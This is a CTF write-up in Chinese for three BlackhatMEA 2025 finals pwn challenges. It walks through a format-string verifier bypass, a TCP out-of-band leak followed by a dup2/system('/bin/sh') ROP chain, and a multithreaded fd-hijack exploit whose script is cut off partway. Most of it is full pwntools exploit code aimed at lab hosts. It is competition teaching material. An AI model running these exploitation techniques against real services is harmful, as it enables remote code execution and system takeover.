Featured image of post blackhatMEA_finals_WP

blackhatMEA_finals_WP

BlackhatMEA2025 CTF FINALS取证与pwn部分

|
|
|

day1

pwn

verifmt

a powerful verifier bro,that’s the Verifmt

analysis

保护全开,glibc2.39环境,题目给了源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int verify_fmt(const char *fmt, size_t n_args) {
  size_t argcnt = 0;
  size_t len = strlen(fmt);

  for (size_t i = 0; i < len; i++) {
    if (fmt[i] == '%') {
      if (fmt[i+1] == '%') {
        i++;
        continue;
      }

      if (isdigit(fmt[i+1])) {
        puts("[-] Positional argument not supported");
        return 1;
      }

      if (argcnt >= n_args) {
        printf("[-] Cannot use more than %lu specifiers\n", n_args);
        return 1;
      }

      argcnt++;
    }
  }

  return 0;
}

int main() {
  size_t n_args;
  long args[4];
  char fmt[256];

  setbuf(stdin, NULL);
  setbuf(stdout, NULL);

  while (1) {
    /* Get arguments */
    printf("# of args: ");
    if (scanf("%lu", &n_args) != 1) {
      return 1;
    }

    if (n_args > 4) {
      puts("[-] Maximum of 4 arguments supported");
      continue;
    }

    memset(args, 0, sizeof(args));
    for (size_t i = 0; i < n_args; i++) {
      printf("args[%lu]: ", i);
      if (scanf("%ld", args + i) != 1) {
        return 1;
      }
    }

    /* Get format string */
    while (getchar() != '\n');
    printf("Format string: ");
    if (fgets(fmt, sizeof(fmt), stdin) == NULL) {
      return 1;
    }

    /* Verify format string */
    if (verify_fmt(fmt, n_args)) {
      continue;
    }

    /* Enjoy! */
    printf(fmt, args[0], args[1], args[2], args[3]);
  }

  return 0;
}

%后跟数字会直接报错,但是根据

如果我们给出的格式化字符串数量大于给出的4的限制也会直接退出 所以要通过*的方式来增加偏移,并且由于是无符号无法向前泄漏

*是一个提取参数的占位符,利用合理的payload,我们就可以合理的占掉args的参数同时仍然保证控制%和读取的参数数量仍然在限定数字内

关于泄漏地址可以参考🚀的博客
最后程序会拆分并打印格式化字符串的内容,最多4个
可以注入\0字符绕过verify,然后用hhn覆盖\0
问题是如果只用%*进行参数弹出我们后面的r9 r10寄存器为nil,format限制的个数也会使得leak的地址是nil,因此我们需要%*c来占取掉6个参数,这样我们最后一个%p便可以打印出栈上地址指针 并且据此我们可以写出进行写入的函数write_byte(addr,val):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def send_payload(n_args, args_list, fmt_str):
    io.sendlineafter(b"# of args: ", str(n_args).encode())
    # 填充 args 数组
    for i in range(n_args):
        io.sendlineafter(f"args[{i}]: ".encode(), str(args_list[i]).encode())
    io.sendlineafter(b"Format string: ", fmt_str)

def write_byte(addr, val):
    """
    使用 %*c%hhn 写入 1 字节
    args[0] = 写入值 (width)
    args[1] = 0 (char)
    args[2] = 目标地址 (pointer)
    """
    # 如果要写入 0x00,必须输出 0x100 (256) 个字符,%hhn 截断为 0x00 from小伞
    if val == 0:
        val = 256

    # args[0] = width/value, args[1] = char, args[2] = pointer
    args_write = [val, 0, addr, 0]

    # 构造 Payload: %*c 消耗 args[0], args[1]; %hhn 消耗 args[2]
    # n_args=3 或 4 均可 (我们用 4)
    send_payload(4, args_write, b"%*c%hhn")

最后写入的时候我们通过泄漏出来的栈指针来指向到返回地址进行写入,因为有while所以有足够的写入机会,只要单字节一个个写入地址即可

exp

不知道为什么就本地docker不能通,明明libc拉的就是容器里的

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
import argparse
import sys

from pwn import *

parser = argparse.ArgumentParser()
parser.add_argument(
    "mode",
    type=int,
    choices=[0, 1, 2],
    nargs="?",
    default=0,
    help="0=local,1=local+gdb,2=remote",
)
args = parser.parse_args()

filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"
remote_addr = "localhost"
remote_port = "13337"


context(log_level="debug", os="linux", arch=arch)  
if args.mode < 2:
    context.terminal = ["tmux", "splitw", "-h"]

def VIO_TEXT(x, code=95):
    return log.info(f"\x1b[{code}m{x}\x1b[0m")

def CLEAR_TEXT(x, code=32):
    return log.success(f"\x1b[{code}m{x}\x1b[0m")

if args.mode == 0:
    io = process(filename)
    print(CLEAR_TEXT("[*] Running on local machine"))
elif args.mode == 1:
    io = process(filename)
    gdb.attach(
        io,
        gdbscript="""
        """,
    )
elif args.mode == 2:
    io = remote(remote_addr, remote_port)
else:
    sys.exit(1)
elf = ELF(filename, checksec=False)
if libc_name:
    libc = ELF(libc_name, checksec=False)
else:
    libc=elf.libc


def send_payload(n_args, args_list, fmt_str):
    io.sendlineafter(b"# of args: ", str(n_args).encode())
    # 填充 args 数组
    for i in range(n_args):
        io.sendlineafter(f"args[{i}]: ".encode(), str(args_list[i]).encode())
    io.sendlineafter(b"Format string: ", fmt_str)


def write_byte(addr, val):
    """
    使用 %*c%hhn 写入 1 字节
    args[0] = 写入值 (width)
    args[1] = 0 (char)
    args[2] = 目标地址 (pointer)
    """
    # 如果要写入 0x00,必须输出 0x100 (256) 个字符,%hhn 截断为 0x00 from小伞
    if val == 0:
        val = 256

    # args[0] = width/value, args[1] = char, args[2] = pointer
    args_write = [val, 0, addr, 0]

    # 构造 Payload: %*c 消耗 args[0], args[1]; %hhn 消耗 args[2]
    # n_args=3 或 4 均可 (我们用 4)
    send_payload(4, args_write, b"%*c%hhn")


# Leak Addresses libc and PIE
VIO_TEXT("Sending payload to leak addresses...")

# 1. Leak Stack Address (使用 3个 %*c 跳过 Nil from RocketMadev blog)
# 预期打印 Arg 7 ([RSP+16] 或附近)
args_leak_stack = [3, 0, 0, 0]
fmt_stack = b"AAAA%*c%*c%*c%p"
send_payload(4, args_leak_stack, fmt_stack)
io.recvuntil(b"AAAA")
io.recvuntil(b"0x")
stack_leak = int(io.recvline().strip(), 16)
CLEAR_TEXT(f"Leaked stack address: {hex(stack_leak)}")

# Arb Read
store_pie_addr = stack_leak - 0x20
args_leak_pie = [0, 0, store_pie_addr, 0]
payload_pie = b"B%*c%sEND"
send_payload(4, args_leak_pie, payload_pie)
io.recvuntil(b"B")
raw_leak_pie = io.recvuntil(b"END", drop=True)
raw_leak_pie = raw_leak_pie.lstrip(b"\x00").strip()
raw_leak_pie = u64(raw_leak_pie[:7].ljust(8, b"\x00"))
pie_base = raw_leak_pie - 0x12F6
CLEAR_TEXT(f"Calculated PIE base address: {hex(pie_base)}")

# Leak Libc 
store_libc_addr = stack_leak + 0x170
args_leak_libc = [0, 0, store_libc_addr, 0]
payload_libc = b"B%*c%sEND"
send_payload(4, args_leak_libc, payload_libc)
io.recvuntil(b"B")
raw_leak_libc = io.recvuntil(b"END", drop=True)
raw_leak_libc = raw_leak_libc.lstrip(b"\x00").strip()
raw_leak_libc = u64(raw_leak_libc[:7].ljust(8, b"\x00"))
pause()
libc_base = (
    raw_leak_libc - 0x2718a 
)  # __libc_start_call_main+122 的偏移,要微调一下
CLEAR_TEXT(f"Calculated Libc base address: {hex(libc_base)}")

# ROP payload
VIO_TEXT("Constructing ROP chain...")

# 计算返回地址位置
OFFSET_TO_RET = 0x170
ret_addr_ptr = stack_leak + OFFSET_TO_RET
CLEAR_TEXT(f"ROP Chain Start Ptr: {hex(ret_addr_ptr)}")

pop_rdi_ret = pie_base + 0x1282
CLEAR_TEXT(f"pop rdi; ret address: {hex(pop_rdi_ret)}")

bin_sh_addr = libc_base + 0x0000000000196031
CLEAR_TEXT(f"/bin/sh address: {hex(bin_sh_addr)}")
system_addr = libc_base + 0x4C330
exit_addr = libc_base + libc.sym["exit"] 
ret_addr = pie_base + 0x101A
CLEAR_TEXT(f"system address: {hex(system_addr)}")
ROP_CHAIN = [
    pop_rdi_ret,  
    bin_sh_addr,  
    ret_addr,
    system_addr,
]
VIO_TEXT("Writing ROP Chain byte-by-byte...")

current_write_ptr = ret_addr_ptr

for addr in ROP_CHAIN:
    for i in range(8):
        byte_to_write = (addr >> (8 * i)) & 0xFF  # 对齐用

        # 写入
        write_byte(current_write_ptr + i, byte_to_write)

    # 移动到下一个地址的起始点
    current_write_ptr += 8

CLEAR_TEXT("ROP Chain written successfully.")

VIO_TEXT("Triggering the overwritten return address...")

# pause()
# 发送非数字字符,使 scanf 失败,main 函数 return,触发 ROP 链
io.sendlineafter(b"# of args: ", b"#")

io.interactive()

StackPrelude

一首前奏曲(Prelude),准备好迎接不可能的栈溢出挑战吧

analysis

对源码进行分析

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#define _GNU_SOURCE 
#include <stdio.h>      // 标准输入/输出库,用于 perror
#include <stdlib.h>     // 标准库,用于 atoi
#include <netinet/in.h> // 包含 sockaddr_in 结构体和 IP 宏定义
#include <sys/socket.h> // 包含 socket, bind, listen, accept 等函数
#include <sys/types.h>  // 包含基本系统数据类型
#include <unistd.h>     // 包含 close 函数

int main(int argc, char **argv) {
    // 客户端地址结构体 (cli) 和服务器地址结构体 (addr),用 {0} 初始化为零
    struct sockaddr_in cli, addr = {0}; 
    socklen_t clen;         // 客户端地址结构体的长度
    int cfd;                // 客户端文件描述符 (Client File Descriptor)
    int sfd = -1;           // 服务器文件描述符 (Server File Descriptor),-1 表示未初始化或失败
    int yes = 1;            // 用于 setsockopt() 设置选项的值 (开启)
    ssize_t n;              // 用于存储接收数据的长度或 recv/send 的返回值
    char buf[0x100];        // 栈缓冲区,大小为 256 字节 (0x100),用于存放客户端发送的数据
    // 解析命令行参数:如果没有参数,默认端口 31337;否则使用第一个参数作为端口号
    unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

    // 1. 创建 Socket
    // AF_INET: IPv4 地址族;SOCK_STREAM: TCP 协议(流式套接字);0: 默认协议
    if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket"); // 输出错误信息
        goto err;
    }

    // 2. 设置 Socket 选项:地址复用
    // SOL_SOCKET: 套接字级别选项;SO_REUSEADDR: 允许重用本地地址,避免 TIME_WAIT 状态导致绑定失败
    // 即使前一个进程在端口上留下了 TIME_WAIT 状态的连接,新进程也能立即启动并重新绑定到该端口,极大地提高了服务器的重启效率。
    if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
        perror("setsockopt(SO_REUSEADDR)");
        goto err;
    }

    // 3. 填充服务器地址结构体
    addr.sin_family = AF_INET;
    // htonl(): 主机字节序转网络字节序 (32位),INADDR_ANY: 监听本机所有网络接口 (0.0.0.0)
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    // htons(): 主机字节序转网络字节序 (16位),设置监听端口
    addr.sin_port = htons(port);

    // 4. 绑定 IP 地址和端口到 Socket
    if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
        perror("bind");
        goto err;
    }

    // 5. 开始监听连接
    // 将 Socket 设为被动模式,准备接受连接;backlog 参数为 1 (等待连接队列的最大长度)
    if (listen(sfd, 1) < 0) {
        perror("listen");
        goto err;
    }

    // 6. 接受客户端连接
    clen = sizeof(cli);
    // 阻塞等待客户端连接。连接成功后,返回新的文件描述符 cfd 用于通信
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
        perror("accept");
        goto err;
    }

    // 7. 进入数据处理循环 (Echo Loop)
    while (1) {
        n = 0;
        // 第一阶段接收:接收数据长度 (ssize_t,通常是 8 字节)
        // MSG_WAITALL: 确保接收到指定字节数 (sizeof(ssize_t)) 后才返回
        recv(cfd, &n, sizeof(ssize_t), MSG_WAITALL);
        
        // 退出条件:
        // n <= 0: 客户端断开连接或发送无效长度
        // n >= 0x200 (512): 长度超限,但注意:
        if (n <= 0 || n >= 0x200) 
            break;

        // 第二阶段接收:根据 n 的大小接收数据到缓冲区 buf
        // MSG_WAITALL: 确保接收到 n 个字节后才返回
        recv(cfd, buf, n, MSG_WAITALL);
        
        send(cfd, buf, n, 0); 
    }

    return 0;

err:
    // 错误处理标签:如果程序在任一阶段失败,跳转到这里
    if (sfd >= 0) close(sfd); // 如果 sfd 已经创建成功,则关闭它
    return 1; 
}

这一题的关键在于要如何在让远程在能够大量leak数据的情况下仍能继续进行交互,这里所建立的socket服务器一次只能处理一个请求,服务器会再接受到我们发送的数据以后然后send发送回来
可以简单看一下计算机网络
第一种想法是利用TCP协议的半关闭特性,我们在四次挥手的时候首先发送一个客户端的半闭FIN包,此时不是正常关闭连接使得服务器由于MSG_WAITALL返回0从而关闭cfd,但是这种条件下我们要关闭输入的包,即便能leak数据我们也无法继续交互
因此只能pass了
第二种想法则是利用中断信号。这里使用OOB(OUT-OF-BAND),在send的时候使用urgent byte从而实现服务器端触发SIGURG信号,由于这是一个异步信号,会打断recv函数,而send依然会返回相同长度的数据并且我们仍然可以继续交互!

交互和exp

先讲讲题目如何进行交互调试

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
parser.add_argument(
    "mode", type=int, choices=[0, 1, 2], nargs="?", default=0,
    help="0=local, 1=local+gdb, 2=remote. (Default: 0)",
)

parser.add_argument(
    "-T", "--threads", type=int, default=None, 
    help="Thread count for remote connections (Overrides 'mode')."
)
args = parser.parse_args()
#...
def launch():
    global io, threads
    process_argv=[filename,str(remote_port)]

    # 优先处理多线程模式 (如果 -T 被设置)
    if args.threads is not None:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        
        threads = [remote(remote_addr, remote_port, ssl=False) for _ in range(args.threads)]
        CLEAR_TEXT(f"[*] Started {args.threads} remote threads on {remote_addr}:{remote_port}")
        return threads

    elif args.mode == 0:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine (mode 0)")
        return io
        
    elif args.mode == 1:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine with GDB (mode 1)")
        gdb.attach(io, gdbscript="""
        """)
        return io
        
    elif args.mode == 2:
        io = remote(remote_addr, remote_port)
        CLEAR_TEXT(f"[*] Running on remote: {remote_addr}:{remote_port} (mode 2)")
        return io
    else:
        sys.exit(1)

#...

if __name__ == "__main__":
    target = launch()
    
    # 判断是否为多线程模式
    if args.threads is not None:
        threads = target
        VIO_TEXT("--- Multi-Threaded Exploit Mode Active ---")
        if threads:
            VIO_TEXT("Entering interactive mode on the first thread for manual control...")
            main(threads)
    else:
        io = target
        VIO_TEXT("--- Single Connection Exploit Mode Active ---")
        
        io.interactive()

以上是我的脚本,在本地调试的时候首先打开程序和pwndbg并建立一个io ,然后再打开一个新的进程进行连接和交互

1
2
python exp_thread.py 1 
python exp_thread.py -T 1

然后就可以在打开了pwndbg的接口进行交互了

具体情况就如图
调试在我们发送数据后打开recv的时候在第二步可以发现如下情况
socket使用fd 4作为固定的交互句柄,如果我们想要在打开shell后进行正常的靶机交互,此处我们还需要尝试使用dup2,将程序交互的fd句柄duplicate到stdout上(或者其他stdin stderr),否则得不到回显,进行的system("/bin/sh")也会直接

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
import argparse
import sys
from pwn import *
# --------------------------
# 1. 命令行参数定义
# --------------------------
parser = argparse.ArgumentParser(description="Pwn Exploit Script with multi-mode and multi-thread support.")

parser.add_argument(
    "mode", type=int, choices=[0, 1, 2], nargs="?", default=0,
    help="0=local, 1=local+gdb, 2=remote. (Default: 0)",
)
parser.add_argument(
    "-T", "--threads", type=int, default=None, 
    help="Thread count for remote connections (Overrides 'mode')."
)
args = parser.parse_args()

# --- 配置信息 ---
filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"
remote_addr = "172.23.0.2" #NOTE:这里要注意不能用docker的回环地址 
remote_port = 5000 
# remote_addr = "localhost" 
# remote_port = 13337

context(log_level="info", os="linux", arch=arch)

# 仅在 local/gdb 模式下,且没有使用线程模式时设置 terminal
if args.mode < 2 and args.threads is None:
    context.terminal = ["tmux", "splitw", "-h"]

elf = ELF(filename, checksec=False)
if libc_name:
    libc = ELF(libc_name, checksec=False)

def VIO_TEXT(x, code=95):
    return log.info(f"\x1b[{code}m{x}\x1b[0m")

def CLEAR_TEXT(x, code=32):
    return log.success(f"\x1b[{code}m{x}\x1b[0m")

def launch():
    global io, threads
    process_argv=[filename,str(remote_port)]

    # 优先处理多线程模式 (如果 -T 被设置)
    if args.threads is not None:
        if args.threads <= 0:
            raise ValueError("Thread count must be positive.")
        
        threads = [remote(remote_addr, remote_port, ssl=False) for _ in range(args.threads)]
        CLEAR_TEXT(f"[*] Started {args.threads} remote threads on {remote_addr}:{remote_port}")
        return threads

    elif args.mode == 0:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine (mode 0)")
        return io
        
    elif args.mode == 1:
        io = process(process_argv)
        CLEAR_TEXT("[*] Running on local machine with GDB (mode 1)")
        gdb.attach(io, gdbscript="""
        """)
        return io
        
    elif args.mode == 2:
        io = remote(remote_addr, remote_port,ssl=False)
        CLEAR_TEXT(f"[*] Running on remote: {remote_addr}:{remote_port} (mode 2)")
        return io
    else:
        sys.exit(1)

# 先python 1启动一个终端进行开启进程和gdb调试,然后再在另一个终端进行数据交互
def main(threads):
    t0:tube
    # 使用第一个线程进行交互泄漏和攻击 
    t0 = threads[0]
    t0.sendline(flat(0x180))
    t0.sock.send(b"A" * 2, constants.MSG_OOB)
    # or 
    # with sock.out_of_band():
    #     sock.send(b"A" * 2)
    data=t0.recv()

    canary=int.from_bytes(data[0x108:0x110],"little")
    libc.address=int.from_bytes(data[0x118:0x120],"little")-0x2a1ca
    
    CLEAR_TEXT(f"[*] Leaked Canary: {hex(canary)}")
    CLEAR_TEXT(f"[*] Leaked Libc Base: {hex(libc.address)}")

    t0.sendline(flat(0x188))

    VIO_TEXT("[*] Sending ROP payload...")
    pop_rdi_ret=libc.address+0x000000000010f78b
    pop_rsi_ret=libc.address+0x0000000000110a7d
    ret_addr=libc.address+0x000000000002882f
    payload=flat({
        0x108-1:canary,
        0x118-1:pop_rdi_ret,
        0x120-1:4, #fd 
        0x128-1:pop_rsi_ret, # 0
        0x138-1:libc.sym['dup2'],
        0x140-1:pop_rdi_ret,
        0x148-1:4,
        0x150-1:pop_rsi_ret,
        0x158-1:1,
        0x160-1:libc.sym['dup2'],
        0x168-1:ret_addr, 
        0x170-1:pop_rdi_ret,
        0x178-1:libc.search(b"/bin/sh\x00").__next__(),
        0x180-1:libc.sym['system'],
    },filler=b"\x00").ljust(0x188,b"\x00")
    t0.send(payload)
    t0.sendline(p64(0))
    t0.interactive()

if __name__ == "__main__":
    target = launch()
    
    # 判断是否为多线程模式
    if args.threads is not None:
        threads = target
        VIO_TEXT("--- Multi-Threaded Exploit Mode Active ---")
        if threads:
            VIO_TEXT("Entering interactive mode on the first thread for manual control...")
            main(threads)
    else:
        io = target
        VIO_TEXT("--- Single Connection Exploit Mode Active ---")
        main([io])  # Wrap io in a list to match the threads parameter
        io.interactive()

tips:

需要注意,当我们要与docker靶机进行交互的时候,不能使用回环地址lo而是要使用本机映射的docker内网IP交互,原因在于使用OOB
docker在映射端口的时候,通常在我们的机子上做了两件事:

  • 设置 iptables 规则:将流量从宿主机端口导向 Docker 桥接网络。
  • 启动 docker-proxy 进程docker-proxy 或类似的组件(如 userland-proxy)在宿主机上运行,监听宿主机端口,并将流量转发到容器的内部 IP 和端口。 而如果我们启动回环地址lo,内核发现目标地址是 127.0.0.1,可能会对 TCP 帧进行优化,跳过校验和等。
    数据不会像普通流量一样经历应用->传输->网络->链路,而是在网络层被捕获。docker-proxy在处理回环流量不会完整维护TCP帧和Flags,因此导致OOB攻击在设置URG指针的时候由于基于TCP帧标志被优化而失败,触发不到recv的中断而泄漏数据失败,因此我们必须使用Docker的桥接网络接口

day2

pwn

Stack_Impromptu

The world impossible is not in my dictionary

analysis

保护全开
首先审计源码
main.cpp:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <pthread.h>

void fatal(const char *msg) {
  perror(msg);
  pthread_exit(NULL);
}

int server_read(int &fd){
  size_t size;
  char buf[0x40];

  memset(buf, 0, sizeof(buf));
  if (read(fd, &size, sizeof(size)) != sizeof(size)
      || size > 0x100
      || read(fd, buf, size) < size)
    goto err;

  write(fd, buf, size);
  return 0;

err:
  close(fd);
  fatal("Could not receive data (read)");
  return 1;
}

void* server_main(void* arg) {
  int fd = (int)((intptr_t)arg);
  while (server_read(fd) == 0);
  return NULL;
}

int main(int argc, char** argv) {
  pthread_t th;
  struct sockaddr_in cli, addr = { 0 };
  socklen_t clen;
  int cfd, sfd = -1, yes = 1;
  unsigned short port = argc < 2 ? 31337 : atoi(argv[1]);

  if ((sfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    perror("socket");
    goto err;
  }

  if (setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(yes)) < 0) {
    perror("setsockopt(SO_REUSEADDR)");
    goto err;
  }

  addr.sin_family = AF_INET;
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  addr.sin_port = htons(port);

  if (bind(sfd, (struct sockaddr*)&addr, sizeof(addr)) < 0) {
    perror("bind");
    goto err;
  }

  if (listen(sfd, 5) < 0) {
    perror("listen");
    goto err;
  }

  while (1) {
    clen = sizeof(cli);
    if ((cfd = accept(sfd, (struct sockaddr*)&cli, &clen)) < 0) {
      perror("accept");
      goto err;
    }

    pthread_create(&th, NULL, server_main, (void*)((intptr_t)cfd));
    pthread_detach(th);
  }

  return 0;

err:
  if (sfd >= 0) close(sfd);
  return 1;
}

当有一个新连接cfd创建的时候,会正常调用pthread_create,并在使用完后就用pthread_detach将其回收
很明显,是一个多线程的挑战,我们不可能直接尝试在一个线程中leak任何内存的内容,关键在于server_mainserver_read

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
int server_read(int &fd){
  size_t size;
  char buf[0x40];

  memset(buf, 0, sizeof(buf));
  if (read(fd, &size, sizeof(size)) != sizeof(size)
      || size > 0x100
      || read(fd, buf, size) < size)
    goto err;

  write(fd, buf, size);
  return 0;

err:
  close(fd);
  fatal("Could not receive data (read)");
  return 1;
}

void* server_main(void* arg) {
  int fd = (int)((intptr_t)arg);
  while (server_read(fd) == 0);
  return NULL;
}

server_read有栈溢出并且会不断被调用,但是就像上一题,这一题可没有MSG_WAITALL来让我们使用中断信号leak信息了

pthread多线程,所有线程都会在一个共同的进程空间内运行,并共享全局变量、堆空间、文件描述符。每个线程仅拥有独立的栈(Stack)!

pthread存在脆弱性,由于内存共享,一个线程的溢出可能会篡改到其他线程的数据,进而导致整个进程被控制、崩溃
这道题我在比赛的时候完全没有思路,严格要求输入的格式和数据大小导致不知道如何实现泄漏,AI也只让我尝试能不能用数据去覆盖到其他线程的内存空间,而且多线程调试也没那么简单,主要是要考虑时序上的交互问题
幸运的是比赛后discord里看到个位解的一位师傅的hint:

那么swap fd具体要怎么做..?—>我们不是有pthread吗!
如果我们能通过多线程但是覆盖掉指定线程的fd,实现fd的劫持,那么是否能实现copy fd并重定向输出,最后实现内存信息的泄漏呢?

fd劫持

我们先尝试使用两个线程来查看是否真的可以劫持fd,创建两个线程

在线程栈2中查看栈底,实际空间如上图,我们完全有足够的空间去覆盖fd

由于取出的是[rbp-0x68]处的qword指针,再二次解析到存储的fd,所以我们实际要写入0x7c的0后最后覆盖掉fd
如此一来,最后到close的时候实际关闭的则是进程1的fd了

堵塞的绕过

而因为我们实际关闭的是线程2,实际上再次分配的时候仍然是供给线程2的fd而不是复用的4 所以在尝试leak数据前必须要创建出4个线程,最后才能出现两个线程复用fd的情况

leak

这里需要使用到一个TCP重置攻击 的方法
由于我们再次获得到了fd=4,而实际上原本最开始创建的线程仍然没有关闭,因此此时会直接向对方发送一个RST包强制关闭连接,而此时第四个线程会再次接手fd=4(极短时间),相当于实现

TCP_RST
tcp恢复连接,而这时候对于建立连接的服务器来说恢复了第一个线程的连接,而又因为我们覆盖掉了线程4的fd=1,因此会将栈上的数据发送到线程4的fd=1上,从而实现leak

ROP

之后要如何利用溢出进行ROP以及如何交互?想法其实类似上文:

  1. 创建线程,利用覆盖关闭掉一个fd
  2. 再次创建线程,此时我们便可以拿到我们需要的fd以及对应的线程控制权
  3. 通过标准输入输出进行交互,因此我们基本获取远程shell

exp

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
import argparse
import socket
import struct
import time
import sys
from pwn import *

parser = argparse.ArgumentParser(description="Sequential start_conion Exploit")
parser.add_argument(
  "mode",
  choices=["0", "1", "2", "t"],
  nargs="?",
  default="0",
  help="0=local, 1=local+gdb, 2=remote, t=direct process (default:0)",
)
args = parser.parse_args()

filename = "./chall"
libc_name = "./libc.so.6"
arch = "amd64"

def VIO_TEXT(x, code=95):
  return log.info(f"\x1b[{code}m{x}\x1b[0m")

def CLEAR_TEXT(x, code=32):
  return log.success(f"\x1b[{code}m{x}\x1b[0m")

def stop(msg="PAUSE", code=91):
    prompt = f"\n\x1b[1;{code}m{msg}\x1b[0m"
    try:
        return raw_input(prompt)
    except EOFError:
        print("") 
        pass

context(log_level="info", os="linux", arch=arch)
if args.mode == "1":
  context.terminal = ["tmux", "splitw", "-h"]

elf = ELF(filename, checksec=False)
if libc_name:
  libc = ELF(libc_name, checksec=False)

def start_con():
  if args.mode in ["0", "t"]:
    return remote("127.0.0.1", 31337)
  else:
    return remote("172.20.0.2", 5000)

def main():
  server_proc = None
  if args.mode in ["1"]:
    server_proc = process(filename)
    # gdb.attach(server_proc, gdbscript="""
    # set follow-fork-mode parent
    # b *(main+428)
    # c
    # """)
    time.sleep(1) # 等待服务端绑定端口
    server_proc.interactive()
    return

  ("--- Starting Sequential Exploit ---")

  # 1. 建立连接并制造竞态/溢出环境
  # [s1] fd=4: 发送长度头,然后挂起
  s1 = start_con()
  time.sleep(0.1)
 
  # [s2] fd=5: 准备覆盖
  s2 = start_con()
 
  VIO_TEXT("Sending size header to s1...")
  s1.send(p64(0x100))
  time.sleep(0.25) # 必须等待,确保 s1 的线程进入 read(fd, buf, size) 状态

  VIO_TEXT("Sending payload via s2...")
  s2.send(p64(0x100)) 
  # s2 发送 payload 覆盖s1的fd
  s2.send(b"\x00" * 0x7C + p32(4))
  time.sleep(0.5)
  # stop("send data from s2")

  # 由于socket的分配机制,这里实际分配到的仍然是供给s2的fd,但是不是4,作为缓冲
  s3 = start_con()
